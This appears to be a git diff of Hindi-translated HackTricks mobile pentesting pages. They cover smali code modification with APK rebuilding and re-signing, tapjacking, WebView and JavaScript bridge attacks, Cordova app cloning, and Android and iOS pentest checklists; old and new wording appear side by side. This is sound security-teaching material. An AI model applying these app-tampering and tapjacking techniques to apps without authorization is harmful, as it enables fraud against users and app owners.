- **रिवर्स इंजीनियरिंग उपकरण और तकनीकें:**
- Ghidra और IDA Pro जैसे उपकरण नैटिव लाइब्रेरीज़ का विश्लेषण करने में मदद करते हैं।
- Ghidra और IDA Pro जैसे उपकरण नेटीव लाइब्रेरी का विश्लेषण करने में मदद करते हैं।
- `JNIEnv` JNI कार्यों और इंटरैक्शन को समझने के लिए महत्वपूर्ण है।
- लाइब्रेरीज़ को लोड करने, विधियों को लिंक करने और नैटिव कार्यों की पहचान करने का अभ्यास करने के लिए व्यायाम प्रदान किए गए हैं।
- लाइब्रेरी लोड करने, विधियों को लिंक करने और नेटीव कार्यों की पहचान करने का अभ्यास करने के लिए व्यायाम प्रदान किए गए हैं।
### संसाधन:
- **ARM असेंबली सीखना:**
- अंतर्निहित आर्किटेक्चर की गहरी समझ के लिए सुझाया गया है
- अंतर्निहित आर्किटेक्चर की गहरी समझ के लिए सुझावित
- [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) Azeria Labs से अनुशंसित है।
- **JNI और NDK दस्तावेज़ीकरण:**
- [Oracle का JNI स्पेसिफिकेशन](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [Oracle का JNI विनिर्देशन](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [एंड्रॉइड के JNI टिप्स](https://developer.android.com/training/articles/perf-jni)
- [NDK के साथ शुरुआत करना](https://developer.android.com/ndk/guides/)
- **नैटिव लाइब्रेरीज़ का डिबगिंग:**
- [JEB डिकंपाइलर का उपयोग करके एंड्रॉइड नैटिव लाइब्रेरीज़ का डिबगिंग](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
- **नेटीव लाइब्रेरी का डिबगिंग:**
- [JEB Decompiler का उपयोग करके एंड्रॉइड नेटीव लाइब्रेरी का डिबगिंग](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
{{#include ../../banners/hacktricks-training.md}}

22
src/mobile-pentesting/android-app-pentesting/smali-changes.md
View File

@ -2,7 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
कभी-कभी एप्लिकेशन कोड को संशोधित करना दिलचस्प होता है ताकि आप छिपी हुई जानकारी तक पहुँच सकें (शायद अच्छी तरह से छिपे हुए पासवर्ड या ध्वज)। फिर, एपीके को डिकंपाइल करना, कोड को संशोधित करना और फिर से संकलित करना दिलचस्प हो सकता है
कभी-कभी एप्लिकेशन कोड को संशोधित करना दिलचस्प होता है ताकि आप छिपी हुई जानकारी तक पहुँच सकें (शायद अच्छी तरह से छिपे हुए पासवर्ड या झंडे)। फिर, यह दिलचस्प हो सकता है कि apk को डिकंपाइल करें, कोड को संशोधित करें और फिर से संकलित करें
**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)
@ -22,31 +22,31 @@ apktool d APP.apk
कुछ **दिलचस्प फ़ाइलें जिन पर आपको ध्यान देना चाहिए**:
- _res/values/strings.xml_ (और res/values/* के अंदर सभी xml)
- _res/values/strings.xml_ (और सभी xmls जो res/values/\* के अंदर हैं)
- _AndroidManifest.xml_
- कोई भी फ़ाइल जिसका एक्सटेंशन _.sqlite_ या _.db_ है।
यदि `apktool` को **ऐप्लिकेशन को डिकोड करने में समस्याएँ हैं**, तो [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) पर एक नज़र डालें या **`-r`** (संसाधनों को डिकोड न करें) तर्क का उपयोग करने का प्रयास करें। फिर, यदि समस्या किसी संसाधन में थी और स्रोत कोड में नहीं, तो आपको समस्या नहीं होगी (आप संसाधनों को भी डिकंपाइल नहीं करेंगे)।
यदि `apktool` को **ऐप्लिकेशन को डिकोड करने में समस्याएँ हैं**, तो [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) पर देखें या **`-r`** (संसाधनों को डिकोड न करें) तर्क का उपयोग करने का प्रयास करें। फिर, यदि समस्या किसी संसाधन में थी और स्रोत कोड में नहीं, तो आपको समस्या नहीं होगी (आप संसाधनों को भी डिकंपाइल नहीं करेंगे)।
## Smali कोड बदलें
आप **निर्देशों को बदल सकते हैं**, कुछ चर के **मूल्य** को बदल सकते हैं या **नए निर्देश जोड़ सकते हैं**। मैं Smali कोड को [**VS Code**](https://code.visualstudio.com) का उपयोग करके बदलता हूँ, फिर आप **smalise एक्सटेंशन** स्थापित कर हैं और संपादक आपको बताएगा कि कोई **निर्देश गलत है**।\
आप **निर्देशों को बदल सकते हैं**, कुछ वेरिएबल्स के **मान** को बदल सकते हैं या **नए निर्देश जोड़ सकते हैं**। मैं Smali कोड को [**VS Code**](https://code.visualstudio.com) का उपयोग करके बदलता हूँ, आप फिर **smalise एक्सटेंशन** स्थापित करें और संपादक आपको बताएगा कि कोई **निर्देश गलत है**।\
कुछ **उदाहरण** यहाँ मिल सकते हैं:
- [Smali परिवर्तन उदाहरण](smali-changes.md)
- [Google CTF 2018 - Shall We Play a Game?](google-ctf-2018-shall-we-play-a-game.md)
या आप [**नीचे कुछ Smali परिवर्तनों की व्याख्या की गई जांच कर सकते हैं**](smali-changes.md#modifying-smali)।
या आप [**नीचे कुछ Smali परिवर्तनों की व्याख्या देख सकते हैं**](smali-changes.md#modifying-smali)।
## APK को पुनः संकलित करें
## APK को फिर से संकलित करें
कोड को संशोधित करने के बाद आप कोड को पुनः **संकलित** कर सकते हैं:
कोड को संशोधित करने के बाद आप कोड को **फिर से संकलित** कर सकते हैं:
```bash
apktool b . #In the folder generated when you decompiled the application
```
यह **नया APK** _**dist**_ फ़ोल्डर के **अंदर** **संकलित** करेगा।
यदि **apktool** एक **त्रुटि** फेंकता है, तो [**नवीनतम संस्करण**](https://ibotpeaches.github.io/Apktool/install/) स्थापित करने का प्रयास करें।
यदि **apktool** एक **त्रुटि** फेंकता है, तो[ **नवीनतम संस्करण**](https://ibotpeaches.github.io/Apktool/install/) स्थापित करने का प्रयास करें।
### **नए APK पर हस्ताक्षर करें**
@ -67,7 +67,7 @@ zipalign -v 4 infile.apk
```
### **नए APK पर हस्ताक्षर करें (फिर से?)**
यदि आप **apksigner** का उपयोग करना **पसंद करते हैं** बजाय jarsigner के, तो **आपको apk पर हस्ताक्षर करना चाहिए** zipalign के साथ **ऑप्टिमाइजेशन लागू करने के बाद**। लेकिन ध्यान दें कि आपको केवल **एक बार एप्लिकेशन पर हस्ताक्षर करना है** jarsigner के साथ (zipalign से पहले) या aspsigner के साथ (zipalign के बाद)।
यदि आप **apksigner** का उपयोग करना **पसंद करते हैं** [**apksigner**](https://developer.android.com/studio/command-line/) के बजाय jarsigner, तो **आपको apk पर हस्ताक्षर करना चाहिए** **zipalign के साथ** ऑप्टिमाइजेशन लागू करने के बाद। लेकिन ध्यान दें कि आपको केवल **एक बार एप्लिकेशन पर हस्ताक्षर करना है** jarsigner के साथ (zipalign से पहले) या aspsigner के साथ (zipalign के बाद)।
```bash
apksigner sign --ks key.jks ./dist/mycompiled.apk
```
@ -143,13 +143,13 @@ invoke-static {v5, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/Strin
- यदि आप फ़ंक्शन के कोड के बीच में लॉगिंग कोड डालना चाहते हैं:
- घोषित वेरिएबल्स की संख्या में 2 जोड़ें: उदाहरण: _.locals 10_ से _.locals 12_
- नए वेरिएबल्स पहले से घोषित वेरिएबल्स के अगले नंबर होने चाहिए (इस उदाहरण में _v10_ और _v11_ होने चाहिए, याद रखें कि यह v0 से शुरू होता है)।
- लॉगिंग फ़ंक्शन के कोड को बदलें और _v5_ और _v1_ के बजाय _v10_ और _v11_ का उपयोग करें।
- लॉगिंग फ़ंक्शन के कोड को बदलें और _v10_ और _v11_ का उपयोग करें _v5_ और _v1_ के बजाय
### टोस्टिंग
याद रखें कि फ़ंक्शन की शुरुआत में _.locals_ की संख्या में 3 जोड़ें।
यह कोड **एक फ़ंक्शन के बीच में** डालने के लिए तैयार है (**ज़रूरत के अनुसार** **वेरिएबल्स** **संख्या** बदलें)। यह **इस.o** का **मान** लेगा, **इसे** **String** में **परिवर्तित** करेगा और फिर इसके मान के साथ **एक टोस्ट** बनाएगा।
यह कोड **एक फ़ंक्शन के बीच में** डालने के लिए तैयार है (**ज़रूरत के अनुसार** **वेरिएबल्स** **संख्या** बदलें)। यह **इस.o** का **मान** लेगा, **इसे** **String** में **परिवर्तित** करेगा और फिर इसके मान के साथ **एक टोस्ट** **बनाएगा**
```bash
const/4 v10, 0x1
const/4 v11, 0x1

2
src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
View File

@ -21,7 +21,7 @@
4. **प्रतिबंधित एप्लिकेशन तक पहुंचें:**
- **Google Play Store** खोलें।
- स्टोर को अब उस देश की सामग्री को दर्शाना चाहिए जिससे आप VPN के माध्यम से जुड़े हैं
- स्टोर को अब उस देश की सामग्री को दर्शाना चाहिए जिसमें आप VPN के माध्यम से जुड़े थे
- आपको उस एप्लिकेशन को खोजने और इंस्टॉल करने में सक्षम होना चाहिए जो पहले आपके वास्तविक स्थान पर उपलब्ध नहीं था।
### महत्वपूर्ण नोट्स:

18
src/mobile-pentesting/android-app-pentesting/tapjacking.md
View File

@ -4,12 +4,12 @@
## **बुनियादी जानकारी**
**Tapjacking** एक हमला है जहाँ एक **दुष्ट** **अनुप्रयोग** लॉन्च किया जाता है और **एक पीड़ित अनुप्रयोग के ऊपर खुद को स्थिति में रखता है**। जब यह पीड़ित ऐप को दृश्यमान रूप से अस्पष्ट करता है, तो इसका उपयोगकर्ता इंटरफ़ेस इस तरह से डिज़ाइन किया गया है कि उपयोगकर्ता को इसके साथ बातचीत करने के लिए धोखा दिया जा सके, जबकि यह बातचीत को पीड़ित ऐप के पास भेज रहा है।\
**Tapjacking** एक हमला है जहाँ एक **दुष्ट** **अनुप्रयोग** लॉन्च किया जाता है और यह **पीड़ित अनुप्रयोग के ऊपर खुद को स्थिति में रखता है**। जब यह स्पष्ट रूप से पीड़ित ऐप को ढक लेता है, तो इसका उपयोगकर्ता इंटरफ़ेस इस तरह से डिज़ाइन किया गया है कि उपयोगकर्ता को इसके साथ इंटरैक्ट करने के लिए धोखा दिया जा सके, जबकि यह इंटरैक्शन को पीड़ित ऐप के पास भेज रहा है।\
इसका प्रभाव यह है कि यह **उपयोगकर्ता को यह जानने से अंधा कर देता है कि वे वास्तव में पीड़ित ऐप पर क्रियाएँ कर रहे हैं**
### पहचान
इस हमले के प्रति संवेदनशील ऐप्स का पता लगाने के लिए, आपको एंड्रॉइड मैनिफेस्ट में **निर्यातित गतिविधियों** की खोज करनी चाहिए (ध्यान दें कि एक गतिविधि जिसमें एक इरादा-फिल्टर है, डिफ़ॉल्ट रूप से स्वचालित रूप से निर्यातित होती है)। एक बार जब आप निर्यातित गतिविधियों को ढूंढ लेते हैं, तो **जांचें कि क्या उन्हें कोई अनुमति चाहिए**। इसका कारण यह है कि **दुष्ट अनुप्रयोग को भी उस अनुमति की आवश्यकता होगी**
इस हमले के प्रति संवेदनशील ऐप्स का पता लगाने के लिए आपको एंड्रॉइड मैनिफेस्ट में **निर्यातित गतिविधियों** की खोज करनी चाहिए (ध्यान दें कि एक गतिविधि जिसमें एक इरादा-फिल्टर है, डिफ़ॉल्ट रूप से स्वचालित रूप से निर्यातित होती है)। एक बार जब आप निर्यातित गतिविधियों को ढूंढ लेते हैं, तो **जांचें कि क्या उन्हें कोई अनुमति चाहिए**। इसका कारण यह है कि **दुष्ट अनुप्रयोग को भी उस अनुमति की आवश्यकता होगी**
### सुरक्षा
@ -19,12 +19,12 @@
#### `filterTouchesWhenObscured`
यदि **`android:filterTouchesWhenObscured`** को **`true`** पर सेट किया गया है, तो `View` को तब भी स्पर्श नहीं मिलेगा जब दृश्य की विंडो किसी अन्य दृश्यमान विंडो द्वारा अस्पष्ट हो।
यदि **`android:filterTouchesWhenObscured`** को **`true`** पर सेट किया गया है, तो `View` को तब भी स्पर्श नहीं मिलेगा जब दृश्य की विंडो किसी अन्य दृश्य विंडो द्वारा ढकी हुई हो।
#### **`setFilterTouchesWhenObscured`**
विशेषता **`setFilterTouchesWhenObscured`** को सत्य पर सेट करने से इस संवेदनशीलता के शोषण को भी रोका जा सकता है यदि एंड्रॉइड संस्करण कम है।\
यदि इसे **`true`** पर सेट किया गया है, तो उदाहरण के लिए, एक बटन को स्वचालित रूप से **अक्षम किया जा सकता है यदि यह अस्पष्ट है**:
गुण **`setFilterTouchesWhenObscured`** को सत्य पर सेट करने से इस संवेदनशीलता का शोषण भी रोका जा सकता है यदि एंड्रॉइड संस्करण कम है।\
यदि इसे **`true`** पर सेट किया गया है, तो उदाहरण के लिए, एक बटन को स्वचालित रूप से **अक्षम किया जा सकता है यदि यह ढका हुआ है**:
```xml
<Button android:text="Button"
android:id="@+id/button1"
@ -43,20 +43,20 @@ android:filterTouchesWhenObscured="true">
### FloatingWindowApp
**FloatingWindowApp** को लागू करने वाला एक उदाहरण प्रोजेक्ट, जिसे अन्य गतिविधियों के ऊपर क्लिकजैकिंग हमले को अंजाम देने के लिए उपयोग किया जा सकता है, यहाँ पाया जा सकता है [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (थोड़ा पुराना, apk बनाने में शुभकामनाएँ).
एक उदाहरण प्रोजेक्ट जो **FloatingWindowApp** को लागू करता है, जिसे अन्य गतिविधियों के ऊपर क्लिकजैकिंग हमले को अंजाम देने के लिए उपयोग किया जा सकता है, यहाँ पाया जा सकता है [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (थोड़ा पुराना, apk बनाने में शुभकामनाएँ).
### Qark
> [!CAUTION]
> ऐसा लगता है कि यह प्रोजेक्ट अब रखरखाव में नहीं है और यह कार्यक्षमता अब ठीक से काम नहीं कर रही है
> ऐसा लगता है कि यह प्रोजेक्ट अब बनाए नहीं रखा गया है और यह कार्यक्षमता अब ठीक से काम नहीं कर रही है
आप [**qark**](https://github.com/linkedin/qark) का उपयोग `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` पैरामीटर के साथ एक दुर्भावनापूर्ण एप्लिकेशन बनाने के लिए कर सकते हैं ताकि संभावित **Tapjacking** कमजोरियों का परीक्षण किया जा सके।\
आप [**qark**](https://github.com/linkedin/qark) का उपयोग `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` पैरामीटर के साथ कर सकते हैं ताकि संभावित **Tapjacking** कमजोरियों के लिए एक दुर्भावनापूर्ण एप्लिकेशन बनाया जा सके।\
निवारण अपेक्षाकृत सरल है क्योंकि डेवलपर यह चुन सकता है कि जब एक दृश्य दूसरे द्वारा ढका होता है तो स्पर्श घटनाएँ प्राप्त न करें। [Android Developers Reference](https://developer.android.com/reference/android/view/View#security) का उपयोग करते हुए:
> कभी-कभी यह आवश्यक होता है कि एक एप्लिकेशन यह सत्यापित कर सके कि कोई क्रिया पूरी जानकारी और उपयोगकर्ता की सहमति के साथ की जा रही है, जैसे कि अनुमति अनुरोध को स्वीकार करना, खरीदारी करना या विज्ञापन पर क्लिक करना। दुर्भाग्यवश, एक दुर्भावनापूर्ण एप्लिकेशन उपयोगकर्ता को इन क्रियाओं को करने के लिए धोखा देने की कोशिश कर सकता है, बिना यह जाने कि दृश्य का उद्देश्य क्या है। एक उपाय के रूप में, ढांचा एक स्पर्श फ़िल्टरिंग तंत्र प्रदान करता है जिसका उपयोग संवेदनशील कार्यक्षमता तक पहुँच प्रदान करने वाले दृश्यों की सुरक्षा में सुधार के लिए किया जा सकता है।
>
> स्पर्श फ़िल्टरिंग सक्षम करने के लिए, [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) को कॉल करें या android:filterTouchesWhenObscured लेआउट विशेषता को true पर सेट करें। जब सक्षम किया जाता है, तो ढांचा उन स्पर्शों को अस्वीकार कर देगा जो तब प्राप्त होते हैं जब दृश्य की विंडो किसी अन्य दृश्य विंडो द्वारा ढकी होती है। परिणामस्वरूप, दृश्य को तब स्पर्श प्राप्त नहीं होंगे जब एक टोस्ट, संवाद या अन्य विंडो दृश्य की विंडो के ऊपर प्रकट होती है।
> स्पर्श फ़िल्टरिंग सक्षम करने के लिए, [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) को कॉल करें या android:filterTouchesWhenObscured लेआउट विशेषता को true पर सेट करें। जब सक्षम किया जाता है, तो ढांचा उन स्पर्शों को अस्वीकार कर देगा जो तब प्राप्त होते हैं जब दृश्य की विंडो किसी अन्य दृश्य विंडो द्वारा ढकी होती है। परिणामस्वरूप, दृश्य तब स्पर्श प्राप्त नहीं करेगा जब भी एक टोस्ट, संवाद या अन्य विंडो दृश्य की विंडो के ऊपर प्रकट होती है।
{{#include ../../banners/hacktricks-training.md}}

12
src/mobile-pentesting/android-app-pentesting/webview-attacks.md
View File

@ -24,10 +24,10 @@ Android विकास का एक महत्वपूर्ण पहल
#### **Secure File Loading**
फाइल सिस्टम एक्सेस को अक्षम करने के लिए जबकि संपत्तियों और संसाधनों तक पहुँच बनाए रखते हुए, `setAllowFileAccess()` विधि का उपयोग किया जाता है। Android R और उसके ऊपर, डिफ़ॉल्ट सेटिंग `false` है।
ाइल सिस्टम एक्सेस को अक्षम करने के लिए जबकि फिर भी संपत्तियों और संसाधनों तक पहुँच प्राप्त करने के लिए, `setAllowFileAccess()` विधि का उपयोग किया जाता है। Android R और उसके ऊपर, डिफ़ॉल्ट सेटिंग `false` है।
- `getAllowFileAccess()` के साथ जांचें
- `setAllowFileAccess(boolean)` के साथ सक्षम या अक्षम करें
- जांचें `getAllowFileAccess()` के साथ।
- सक्षम या अक्षम करें `setAllowFileAccess(boolean)` के साथ।
#### **WebViewAssetLoader**
@ -54,13 +54,13 @@ adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView es support_url
```
### Javascript Bridge
Android द्वारा एक विशेषता प्रदान की गई है जो **JavaScript** को एक WebView में **स्थानीय Android ऐप कार्यों** को कॉल करने की अनुमति देती है। यह `addJavascriptInterface` विधि का उपयोग करके प्राप्त किया जाता है, जो JavaScript को स्थानीय Android कार्यक्षमताओं के साथ एकीकृत करता है, जिसे _WebView JavaScript bridge_ कहा जाता है। सावधानी बरतने की सलाह दी जाती है क्योंकि यह विधि WebView के भीतर सभी पृष्ठों को पंजीकृत JavaScript इंटरफेस ऑब्जेक्ट तक पहुंचने की अनुमति देती है, यदि संवेदनशील जानकारी इन इंटरफेस के माध्यम से उजागर होती है तो यह एक सुरक्षा जोखिम पैदा कर सकती है।
Android द्वारा एक विशेषता प्रदान की गई है जो **JavaScript** को एक WebView में **स्थानीय Android ऐप कार्यों** को कॉल करने की अनुमति देती है। यह `addJavascriptInterface` विधि का उपयोग करके प्राप्त किया जाता है, जो JavaScript को स्थानीय Android कार्यक्षमताओं के साथ एकीकृत करता है, जिसे _WebView JavaScript bridge_ कहा जाता है। सावधानी बरतने की सलाह दी जाती है क्योंकि यह विधि WebView के भीतर सभी पृष्ठों को पंजीकृत JavaScript इंटरफ़ेस ऑब्जेक्ट तक पहुँचने की अनुमति देती है, यदि संवेदनशील जानकारी इन इंटरफेस के माध्यम से उजागर होती है तो यह सुरक्षा जोखिम पैदा कर सकती है।
- **अत्यधिक सावधानी की आवश्यकता है** उन ऐप्स के लिए जो Android संस्करण 4.2 से नीचे लक्षित करते हैं, क्योंकि एक भेद्यता है जो दुर्भावनापूर्ण JavaScript के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है, जो परावर्तन का शोषण करती है।
- **अत्यधिक सावधानी की आवश्यकता है** उन ऐप्स के लिए जो Android संस्करण 4.2 से नीचे लक्षित करते हैं, क्योंकि एक भेद्यता है जो दुर्भावनापूर्ण JavaScript के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है, जो परावर्तन का लाभ उठाती है।
#### Implementing a JavaScript Bridge
- **JavaScript इंटरफेस** स्थानीय कोड के साथ बातचीत कर सकते हैं, जैसा कि उदाहरणों में दिखाया गया है जहा एक वर्ग विधि को JavaScript के लिए उजागर किया गया है:
- **JavaScript इंटरफेस** स्थानीय कोड के साथ बातचीत कर सकते हैं, जैसा कि उदाहरणों में दिखाया गया है जहा एक वर्ग विधि को JavaScript के लिए उजागर किया गया है:
```javascript
@JavascriptInterface
public String getSecret() {

6
src/mobile-pentesting/android-checklist.md
View File

@ -3,7 +3,7 @@
{{#include ../banners/hacktricks-training.md}}
### [Android के मूल सिद्धांत सीखें](android-app-pentesting/#2-android-application-fundamentals)
### [Android के मूलभूत ज्ञान को सीखें](android-app-pentesting/#2-android-application-fundamentals)
- [ ] [बुनियादी बातें](android-app-pentesting/#fundamentals-review)
- [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali)
@ -36,7 +36,7 @@
- [ ] क्या अनुप्रयोग [असुरक्षित रूप से आंतरिक या बाहरी डेटा सहेज रहा है](android-app-pentesting/#insecure-data-storage)?
- [ ] क्या कोई [पासवर्ड हार्ड कोडेड या डिस्क में सहेजा गया है](android-app-pentesting/#poorkeymanagementprocesses)? क्या ऐप [असुरक्षित क्रिप्टो एल्गोरिदम का उपयोग कर रहा है](android-app-pentesting/#useofinsecureandordeprecatedalgorithms)?
- [ ] क्या सभी पुस्तकालय PIE ध्वज का उपयोग करके संकलित हैं?
- [ ] यह न भूलें कि इस चरण के दौरान आपकी मदद करने के लिए [स्थैतिक Android विश्लेषक](android-app-pentesting/#automatic-analysis) की एक बड़ी संख्या है।
- [ ] यह न भूलें कि इस चरण के दौरान आपकी मदद करने के लिए कई [स्थैतिक Android विश्लेषक](android-app-pentesting/#automatic-analysis) है
### [गतिशील विश्लेषण](android-app-pentesting/#dynamic-analysis)
@ -51,7 +51,7 @@
- [ ] [HTTP/HTTPS ट्रैफ़िक का निरीक्षण करें](android-app-pentesting/#inspecting-http-traffic)
- [ ] यह वास्तव में महत्वपूर्ण है, क्योंकि यदि आप HTTP ट्रैफ़िक को कैप्चर कर सकते हैं तो आप सामान्य वेब कमजोरियों की खोज कर सकते हैं (Hacktricks में वेब कमजोरियों के बारे में बहुत सारी जानकारी है)।
- [ ] संभावित [Android क्लाइंट साइड इंजेक्शन](android-app-pentesting/#android-client-side-injections-and-others) के लिए जांचें (संभवतः कुछ स्थैतिक कोड विश्लेषण यहाँ मदद करेगा)
- [ ] [Frida](android-app-pentesting/#frida): बस Frida, इसका उपयोग करें ताकि अनुप्रयोग से दिलचस्प गतिशील डेटा प्राप्त किया जा सके (शायद कुछ पासवर्ड...)
- [ ] [Frida](android-app-pentesting/#frida): बस Frida, इसका उपयोग करें ताकि आप अनुप्रयोग से दिलचस्प गतिशील डेटा प्राप्त कर सकें (शायद कुछ पासवर्ड...)
### कुछ अवरोधन/डीअवरोधन जानकारी

10
src/mobile-pentesting/cordova-apps.md
View File

@ -4,13 +4,13 @@
**अधिक जानकारी के लिए देखें [https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58](https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58)**. यह एक संक्षेप है:
Apache Cordova को **हाइब्रिड एप्लिकेशन** के विकास के लिए **JavaScript, HTML, और CSS** का उपयोग करने के लिए जाना जाता है। यह Android और iOS एप्लिकेशन बनाने की अनुमति देता है; हालाँकि, इसमें एप्लिकेशन के स्रोत कोड को सुरक्षित करने के लिए कोई डिफ़ॉल्ट तंत्र नहीं है। React Native के विपरीत, Cordova डिफ़ॉल्ट रूप से स्रोत कोड को संकलित नहीं करता है, जो कोड छेड़छाड़ की कमजोरियों का कारण बन सकता है। Cordova एप्लिकेशन को रेंडर करने के लिए WebView का उपयोग करता है, जो HTML और JavaScript कोड को APK या IPA फ़ाइलों में संकलित करने के बाद भी उजागर करता है। दूसरी ओर, React Native JavaScript कोड को निष्पादित करने के लिए एक JavaScript VM का उपयोग करता है, जो बेहतर स्रोत कोड सुरक्षा प्रदान करता है।
Apache Cordova को **JavaScript, HTML, और CSS** का उपयोग करके **हाइब्रिड एप्लिकेशन** विकसित करने के लिए जाना जाता है। यह Android और iOS एप्लिकेशन बनाने की अनुमति देता है; हालाँकि, इसमें एप्लिकेशन के स्रोत कोड को सुरक्षित करने के लिए कोई डिफ़ॉल्ट तंत्र नहीं है। React Native के विपरीत, Cordova डिफ़ॉल्ट रूप से स्रोत कोड को संकलित नहीं करता है, जो कोड छेड़छाड़ की कमजोरियों का कारण बन सकता है। Cordova एप्लिकेशन को रेंडर करने के लिए WebView का उपयोग करता है, जो HTML और JavaScript कोड को APK या IPA फ़ाइलों में संकलित करने के बाद भी उजागर करता है। दूसरी ओर, React Native JavaScript कोड को निष्पादित करने के लिए एक JavaScript VM का उपयोग करता है, जो बेहतर स्रोत कोड सुरक्षा प्रदान करता है।
### Cordova एप्लिकेशन को क्लोन करना
Cordova एप्लिकेशन को क्लोन करने से पहले सुनिश्चित करें कि NodeJS अन्य पूर्वापेक्षाओं जैसे Android SDK, Java JDK, और Gradle के साथ स्थापित है। आधिकारिक Cordova [दस्तावेज़](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) इन इंस्टॉलेशन के लिए एक व्यापक गाइड प्रदान करता है।
Cordova एप्लिकेशन को क्लोन करने से पहले, सुनिश्चित करें कि NodeJS अन्य पूर्वापेक्षाओं जैसे Android SDK, Java JDK, और Gradle के साथ स्थापित है। आधिकारिक Cordova [दस्तावेज़](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) इन इंस्टॉलेशन के लिए एक व्यापक गाइड प्रदान करता है।
एक उदाहरण एप्लिकेशन पर विचार करें जिसका नाम `Bank.apk` है और पैकेज नाम `com.android.bank` है। स्रोत कोड तक पहुँचने के लिए, `bank.apk` को अनज़िप करें और `bank/assets/www` फ़ोल्डर में जाएँ। इस फ़ोल्डर में एप्लिकेशन का पूरा स्रोत कोड है, जिसमें HTML और JS फ़ाइलें शामिल हैं। एप्लिकेशन की कॉन्फ़िगरेशन `bank/res/xml/config.xml` में मिल सकती है।
एक उदाहरण एप्लिकेशन का नाम `Bank.apk` है जिसका पैकेज नाम `com.android.bank` है। स्रोत कोड तक पहुँचने के लिए, `bank.apk` को अनज़िप करें और `bank/assets/www` फ़ोल्डर में जाएँ। इस फ़ोल्डर में एप्लिकेशन का पूरा स्रोत कोड है, जिसमें HTML और JS फ़ाइलें शामिल हैं। एप्लिकेशन की कॉन्फ़िगरेशन `bank/res/xml/config.xml` में मिल सकती है।
एप्लिकेशन को क्लोन करने के लिए, इन चरणों का पालन करें:
```bash
@ -20,7 +20,7 @@ cd bank-new
```
`bank/assets/www` की सामग्री को `bank-new/www` में कॉपी करें, `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, और `plugins/` निर्देशिका को छोड़कर।
नया Cordova प्रोजेक्ट बनाते समय प्लेटफ़ॉर्म (Android या iOS) निर्दिष्ट करें। Android ऐप को क्लोन करने के लिए, Android प्लेटफ़ॉर्म जोड़ें। ध्यान दें कि Cordova के प्लेटफ़ॉर्म संस्करण और Android API स्तर अलग हैं। प्लेटफ़ॉर्म संस्करणों और समर्थित Android APIs के विवरण के लिए Cordova [documentation](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) देखें।
नया Cordova प्रोजेक्ट बनाते समय प्लेटफ़ॉर्म (Android या iOS) निर्दिष्ट करें। Android ऐप को क्लोन करते समय, Android प्लेटफ़ॉर्म जोड़ें। ध्यान दें कि Cordova के प्लेटफ़ॉर्म संस्करण और Android API स्तर अलग हैं। प्लेटफ़ॉर्म संस्करणों और समर्थित Android APIs के विवरण के लिए Cordova [documentation](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) देखें।
उचित Cordova Android प्लेटफ़ॉर्म संस्करण निर्धारित करने के लिए, मूल एप्लिकेशन के `cordova.js` फ़ाइल में `PLATFORM_VERSION_BUILD_LABEL` की जांच करें।
@ -44,7 +44,7 @@ APK बनाने के लिए, निम्नलिखित कमा
cd bank-new
cordova build android — packageType=apk
```
यह कमांड एक APK उत्पन्न करता है जिसमें डिबग विकल्प सक्षम होता है, जो Google Chrome के माध्यम से डिबगिंग को सुविधाजनक बनाता है। यदि एप्लिकेशन में कोड छेड़छाड़ पहचान तंत्र शामिल हैं, तो स्थापना से पहले APK पर हस्ताक्षर करना महत्वपूर्ण है।
यह कमांड एक APK उत्पन्न करता है जिसमें डिबग विकल्प सक्षम होता है, जो Google Chrome के माध्यम से डिबगिंग को सुविधाजनक बनाता है। यदि एप्लिकेशन में कोड छेड़छाड़ का पता लगाने के तंत्र शामिल हैं, तो स्थापना से पहले APK पर हस्ताक्षर करना महत्वपूर्ण है।
### स्वचालन उपकरण

14
src/mobile-pentesting/ios-pentesting-checklist.md
View File

@ -48,7 +48,7 @@
### **Local Authentication**
- [ ] यदि एप्लिकेशन में [**स्थानीय प्रमाणीकरण**](ios-pentesting/#local-authentication) का उपयोग किया जाता है, तो आपको जांच करनी चाहिए कि प्रमाणीकरण कैसे काम कर रहा है।
- [ ] यदि एप्लिकेशन में [**स्थानीय प्रमाणीकरण**](ios-pentesting/#local-authentication) का उपयोग किया गया है, तो आपको जांच करनी चाहिए कि प्रमाणीकरण कैसे काम कर रहा है।
- [ ] यदि यह [**स्थानीय प्रमाणीकरण ढांचे**](ios-pentesting/#local-authentication-framework) का उपयोग कर रहा है तो इसे आसानी से बायपास किया जा सकता है
